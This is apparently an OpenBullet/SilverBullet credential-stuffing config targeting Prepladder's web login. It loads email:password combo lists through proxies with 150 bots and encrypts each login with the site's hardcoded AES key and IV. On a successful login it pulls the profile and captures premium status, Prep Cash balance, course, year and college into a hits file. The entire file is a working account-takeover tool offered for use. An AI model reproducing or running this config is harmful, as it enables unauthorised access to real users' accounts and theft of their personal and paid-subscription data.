[SETTINGS]
{
  "Name": "Prepladder Api Config",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2021-03-08T05:48:31.6208821-08:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Studyfreak",
  "Version": "1.1.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION AESEncrypt "NjEyMGU2MjI0ZDQxMjdhZWU3ZDBiMWY2YTJkNzdkNmU=" "NTc4ZmVmODAxOGJkZDNiNw==" CBC PKCS7 "%<+OJV[8l4p6{\"accessToken\":\"\",\"version\":1,\"platform\":\"web\",\"appName\":\"prepladder\",\"courseID\":1,\"email\":\"<USER>\",\"apiKey\":\"\",\"password\":\"<PASS>\",\"login\":1,\"token\":\"*f7254437614/A0742122248}C2519396800\"}" -> VAR "Encrypted" 

REQUEST POST "https://web.prepladder.com/login" 
  CONTENT "{\"enc_request\":\"<Encrypted>\"}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#enc_response PARSE "<SOURCE>" JSON "enc_response" -> VAR "enc_response" 

#Responce FUNCTION AESDecrypt "NjEyMGU2MjI0ZDQxMjdhZWU3ZDBiMWY2YTJkNzdkNmU=" "NTc4ZmVmODAxOGJkZDNiNw==" CBC PKCS7 "<enc_response>" -> VAR "Responce" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<Responce>" Contains "status\":false" 
  KEYCHAIN Success OR 
    KEY "<Responce>" Contains "status\":true" 

#courseID PARSE "<Responce>" LR "\"courseID\":" "," -> VAR "courseID" 

#apiKey PARSE "<Responce>" LR "\"apiKey\":\"" "\",\"" -> VAR "apiKey" 

#Premium PARSE "<Responce>" LR "\"isPremium\":" "," -> VAR "Premium" 

#Premium FUNCTION Translate 
  KEY "0" VALUE "false" 
  KEY "1" VALUE "true" 
  "<Premium>" -> CAP "Premium" 

#Encoadedkeys FUNCTION AESEncrypt "NjEyMGU2MjI0ZDQxMjdhZWU3ZDBiMWY2YTJkNzdkNmU=" "NTc4ZmVmODAxOGJkZDNiNw==" CBC PKCS7 "8@7{2`*:OW7{\"email\":\"<USER>\",\"apiKey\":\"<apiKey>\",\"appName\":\"prepladder\",\"platform\":\"web\",\"version\":20,\"courseID\":<courseID>}" -> VAR "Encoadedkeys" 

REQUEST POST "https://web.prepladder.com/getUserProfile" 
  CONTENT "{\"enc_request\":\"<Encoadedkeys>\"}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Subscriptions PARSE "<SOURCE>" JSON "enc_response" -> VAR "Subscriptions" 

#Decode_responce FUNCTION AESDecrypt "NjEyMGU2MjI0ZDQxMjdhZWU3ZDBiMWY2YTJkNzdkNmU=" "NTc4ZmVmODAxOGJkZDNiNw==" CBC PKCS7 "<Subscriptions>" -> VAR "Decode_responce" 

#Prep_Cash PARSE "<Decode_responce>" LR "prepcash\":" ",\"" CreateEmpty=FALSE -> CAP "Prep Cash" 

#Course PARSE "<Decode_responce>" LR "{\"label\":\"Course\",\"icon\":\"\",\"orderBy\":4,\"value\":\"" "\"" CreateEmpty=FALSE -> CAP "Course" 

#Year PARSE "<Decode_responce>" LR "\"year\":\"" "\"," CreateEmpty=FALSE -> CAP "Year" 

#College PARSE "<Decode_responce>" LR "{\"label\":\"College\",\"icon\":\"\",\"orderBy\":5,\"value\":\"" "\"" CreateEmpty=FALSE -> CAP "College" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" AND 
    KEY "<Prep Cash>" EqualTo "0" 
    KEY "<Premium>" Contains "false"
